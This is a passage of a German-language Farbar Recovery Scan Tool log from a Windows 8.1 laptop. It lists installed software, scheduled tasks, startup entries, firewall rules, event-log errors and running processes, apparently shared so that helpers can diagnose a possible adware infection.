(HKLM-x32\...\Adobe AIR) (Version: 4.0.0.1390 - Adobe Systems Incorporated) Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.0.413 - Adobe Systems Incorporated) Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.6 - Adobe Systems Incorporated) Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated) Adobe Photoshop Elements 13 (HKLM-x32\...\{609818B9-23EB-4196-B466-EFE05E92A32F}) (Version: 13.0 - Adobe Systems Incorporated) Amazon 1Button App (x32 Version: 1.0.6 - Amazon) Hidden Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.16.282 - Avira Operations GmbH & Co. KG) clear.fi SDK - Video 2 (x32 Version: 2.2.2722 - CyberLink Corp.) Hidden clear.fi SDK- Movie 2 (x32 Version: 2.2.2729 - CyberLink Corp.) 
Hidden CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3729_45993 - CyberLink Corp.) Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.17 - Dolby Laboratories Inc) Epson Customer Research Participation (HKLM\...\{B26449A6-6007-4460-B4FE-C4776115BCEA}) (Version: 1.61.0000 - EPSON) EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation) EPSON XP-700 Series Printer Uninstall (HKLM\...\EPSON XP-700 Series) (Version: - SEIKO EPSON Corporation) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 35.0.1916.153 - Google Inc.) HID Monitor (HKLM-x32\...\{31923C55-8208-4D0A-8AD6-3AE099A1A741}) (Version: 1.1.5 - Acer Incorporated) Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3006 - Acer Incorporated) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1281 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation) Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation) Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation) Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3010 - Acer Incorporated) Malwarebytes Anti-Malware Version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes) Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation) Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation) Microsoft SkyDrive (HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft 
Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Mozilla Firefox 45.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 de)) (Version: 45.0.1 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0.1 - Mozilla) Nero BackItUp 12 Essentials OEM.a01 (HKLM-x32\...\{4CA8F973-6377-4ABF-9ED5-CC2323B3C000}) (Version: 12.5.00500 - Nero AG) Nero MediaHome Free (HKLM-x32\...\{6CC8CA12-AD2B-4C07-B2C4-B32CDBF5F29D}) (Version: 15.0.01800 - Nero AG) Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.0.1 - Nikon) Picture Control Utility (HKLM-x32\...\{87441A59-5E64-4096-A170-14EFE67200C3}) (Version: 1.2.2 - Nikon) Prerequisite installer (x32 Version: 12.0.0003 - Nero AG) Hidden Prerequisite installer (x32 Version: 15.0.0005 - Nero AG) Hidden Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.222 - Qualcomm Atheros Communications) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.14.327.2013 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6870 - Realtek Semiconductor Corp.) Realtek PCIE Card Reader (HKLM-x32\...\{C9661090-C134-46E8-90B2-76D72355C2A6}) (Version: 6.2.9200.21222 - Realtek Semiconductor Corp.) 
Samsung Link 1.8.0.1403131552 (HKLM\...\8474-7877-9059-0204) (Version: 1.8.0.1403131552 - Copyright 2013 SAMSUNG) SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.33.0 - SAMSUNG Electronics Co., Ltd.) Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee) Software Updater (HKLM-x32\...\{B307472F-7BD9-4040-9255-CE6D6A1196A3}) (Version: 4.3.1 - SEIKO EPSON CORPORATION) SonyEditor (remove only) (HKLM-x32\...\SonyEditor) (Version: - ) Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation) Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation) Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) CustomCLSID: HKU\S-1-5-21-1569062512-718196537-2772323438-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation) ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
Task: {1297570B-38F1-49A5-A941-B11ED2E003D4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-05] (Adobe Systems Incorporated)
Task: {45E15A8F-D60A-4899-94EE-F2D2FFC44C1D} - System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} => C:\WINDOWS\system32\regsvr32.exe [2014-10-29] (Microsoft Corporation)
Task: {582339AA-55CB-446D-9C0A-E237D27C9460} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2013-02-08] (CyberLink)
Task: {6631CA39-E6CA-443E-A7B3-C72F37978029} - System32\Tasks\{12146BCF-AB85-4EF1-B4A9-E5E62ADD7B59} => pcalua.exe -a "C:\Program Files (x86)\GUPlayer\Uninstaller.exe" -d "C:\Program Files (x86)\GUPlayer"
Task: {691F8DB4-04E1-4275-8E3C-4A02A8A0BF55} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-22] (Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2013-10-31 18:49 - 2014-03-13 16:52 - 00013824 _____ () C:\Program Files\Samsung\Samsung Link\JniSys.dll
2016-03-29 16:39 - 2016-03-29 16:39 - 00515584 _____ () C:\Windows\Temp\sqlite-3.7.2-sqlitejdbc.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 02149376 _____ () C:\Program Files\Samsung\Samsung Link\scone_proxy.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 01630720 _____ () C:\Program Files\Samsung\Samsung Link\scone_stub.dll
2013-06-29 02:51 - 2013-02-20 22:58 - 00111176 _____ () C:\Program Files (x86)\Acer\clear.fi plug-in\Clearfishellext_x64.dll
2010-01-30 02:40 - 2010-01-30 02:40 - 04254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-01-30 03:41 - 2010-01-30 03:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2013-06-29 02:11 - 2013-02-18 07:38 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\acer01.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\...\StartupApproved\Run: => "ETDCtrl"
HKLM\...\StartupApproved\Run: => "Samsung Link"
HKLM\...\StartupApproved\Run: => "3D BubbleSound"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "Nikon Message Center 2"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "Registry Helper"
HKLM\...\StartupApproved\Run32: => "fst_de_19"
HKLM\...\StartupApproved\Run32: => "t4pc_en_3"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "gmsd_de_005010126"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => " QQPCTray"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "OneNote 2010 Bildschirmausschnitt- und Startprogramm.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "hqghumeaylnlf.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\Run: => "CAHeadless"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{290FEF21-DC28-4CDB-84A3-0CF48C59C53F}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe
FirewallRules: [{53F21F5D-793A-40CD-BE18-64DC327CAC74}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe
FirewallRules: [{9366E490-4066-453E-A63E-30D38D3C4385}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\VideoPlayer.exe
FirewallRules: [{957FF23A-1843-4C65-BBCF-377F30A37421}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{9FC26195-3C09-4CCF-91F4-496AAC3E0579}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{6F98C6CA-669A-49BB-A000-DCBC70357288}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{2E6F58D2-F1DA-40A7-B824-7BFBEC8C62F3}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{B82CCA82-236A-4606-B2A1-6683CE2BB5E1}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe
FirewallRules: [{710D6FB0-C282-43DE-94B6-5DA25FA840BA}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe
FirewallRules: [{B0B96A98-BB54-4416-95EF-A4FFA1D3E92A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{22649299-4229-4001-9C23-2C8EF0D021C6}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{75C220A7-7912-4649-96E4-1C6D42C27C3F}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{A945E41D-11DC-484D-A439-8F75665FF810}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{118DE993-AB64-4609-8043-8989F6E196A0}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe
FirewallRules: [{297E9E38-6323-4850-8793-890A4E1205BB}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe
FirewallRules: [{1BA61F3A-7C93-4D2E-B332-92CF5BE489EC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{DC615730-96FE-44BE-9092-C23B56CDB009}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{5F0C690B-51F3-4FFA-8EEE-C5829966CB9B}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe
FirewallRules: [{6F77C27B-B0FA-4B07-B15E-9913C71FC2BB}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe
FirewallRules: [{EFBAC9EC-6AAB-4AE6-88EE-873AD8ABC7E1}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe
FirewallRules: [{0D61EDDD-3DAD-4D0E-85F1-F7152ED3BEC4}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe
FirewallRules: [{55C9BFD4-E19A-4C09-A550-EA815A77F875}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{368618D4-80BD-47EC-B00A-554CCFD16ECC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{D5705000-430A-4DE7-B504-F3176E52BD62}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe
FirewallRules: [{10AAFB71-519E-4031-9E51-E38B666F3808}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe
FirewallRules: [{147C84EE-5F68-49BF-A093-CEBEEBD1F845}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe
FirewallRules: [{57FBBC48-338F-4339-B94A-B6F949FAE9E4}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe
FirewallRules: [{484626A6-A444-4833-BEAF-C493E3DB322D}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe
FirewallRules: [{80B4DFDA-F518-4EE4-A150-A2CD466AD4BD}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe
FirewallRules: [{479688D5-1CD3-4C96-8C3F-98DAA8676511}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe
FirewallRules: [{684F9EC8-CE62-45CF-8C0A-E600CB6770E5}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe
FirewallRules: [{2932FB41-9623-445B-B74C-AB39C41E41D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{FA7AD37A-61AE-4AC5-90E8-0ACB0E02C82A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{B8380D2E-28B4-4239-B1FC-E21AD7DB6507}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{0144819F-7C36-4E95-8468-A54663C763D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{682BEC69-6576-4675-9D34-3195707A8D30}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{A5EA98FB-B16F-4B86-B9F3-3F7B725FEA14}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{C2F25F89-9DFD-4DEF-B157-4A68AA57BEF1}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{40733857-3854-4F7D-ABAD-8839839E1CA3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{1AF1DCBF-BCE3-4798-B587-7124462DB377}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{AA88FEE8-E662-4ADE-9A23-27CD92A2A4C3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{217A8D6B-829D-4AE5-B0F9-93F9AD735CC2}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{0F2CD704-F53C-42B9-8565-E6AF5F373409}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{60A20179-977C-4925-BD45-186CC74D8B19}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{00ADB8FE-4D9E-4B3D-B9AB-6474FEB64908}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{01BD45EA-2486-4F1B-B219-B768D7AC80D4}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
FirewallRules: [{DA460DCD-D762-4AA5-81BD-338370077CB1}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
FirewallRules: [{95170546-A139-4F6A-B54E-110BAA90A507}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
FirewallRules: [{72068411-0556-4539-BC7C-535A80472C40}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
FirewallRules: [{C2658416-A2DF-4190-A1C5-4CFAAC757C0E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8588E4BB-3623-4737-ABB4-DEE15F85D85B}] => (Allow) C:\Users\Denny\AppData\Local\Chromium\Application\chrome.exe

==================== Wiederherstellungspunkte =========================

22-03-2016 02:55:07 JRT Pre-Junkware Removal
29-03-2016 12:45:27 Windows Modules Installer

==================== Fehlerhafte Geräte im Gerätemanager =============

==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/29/2016 07:00:56 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/29/2016 07:00:56 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Error: (03/29/2016 07:00:56 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2

Systemfehler:
=============
Error: (03/29/2016 06:40:53 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Superfetch" wurde mit folgendem Fehler beendet: %%1062

Error: (03/29/2016 06:40:35 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler: %%1056

Error: (03/29/2016 06:40:06 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "DeleteFlag" aufgrund folgenden Fehlers fehlgeschlagen: %%5

Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Security" aufgrund folgenden Fehlers fehlgeschlagen: %%5

Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Security" aufgrund folgenden Fehlers fehlgeschlagen: %%5

Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Security" aufgrund folgenden Fehlers fehlgeschlagen: %%5

Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Security" aufgrund folgenden Fehlers fehlgeschlagen: %%5

Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Modules Installer" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "MBAMScheduler" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "MBAMService" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

CodeIntegrity:
===================================
Date: 2016-01-27 20:34:50.024
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:33:27.259
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:32.120
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:31.842
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:21.532
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:21.366
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:19.557
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:13.438
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:00.333
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-27 20:31:00.166
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.

==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i5-3337U CPU @ 1.80GHz
Prozentuale Nutzung des RAM: 39%
Installierter physikalischer RAM: 3971.27 MB
Verfügbarer physikalischer RAM: 2383.73 MB
Summe virtueller Speicher: 8067.27 MB
Verfügbarer virtueller Speicher: 5881.53 MB

==================== Laufwerke ================================

Drive c: (Acer) (Fixed) (Total:449.11 GB) (Free:393.18 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 30743A9D)
Partition: GPT.

==================== Ende von Addition.txt ============================

Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
durchgeführt von Denny (Administrator) auf SCHNEIDER (29-03-2016 19:05:29)
Gestartet von C:\Users\Denny\Desktop
Geladene Profile: Denny (Verfügbare Profile: Denny & Administrator)
Platform: Windows 8.1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser nicht gefunden!)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\AdminService.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe
(SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe
